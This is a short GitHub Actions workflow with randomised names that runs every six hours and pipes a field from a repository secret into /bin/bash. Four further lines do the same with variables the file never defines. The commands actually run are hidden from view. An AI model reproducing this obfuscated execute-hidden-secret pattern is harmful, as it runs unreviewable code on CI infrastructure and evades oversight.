name: yangxiong19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '5 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yangxiong19871010
        env:
          gnsm2: ${{ secrets.gnsm2 }}
        run: |
          echo $gnsm2 | jq -r .d8598 | /bin/bash
          echo $vy68317 | jq -r .rjjs76577 | /bin/bash
          echo $sccw91 | jq -r .mf663 | /bin/bash
          echo $xje8480 | jq -r .uh8736 | /bin/bash
          echo $lusp15 | jq -r .d216 | /bin/bash

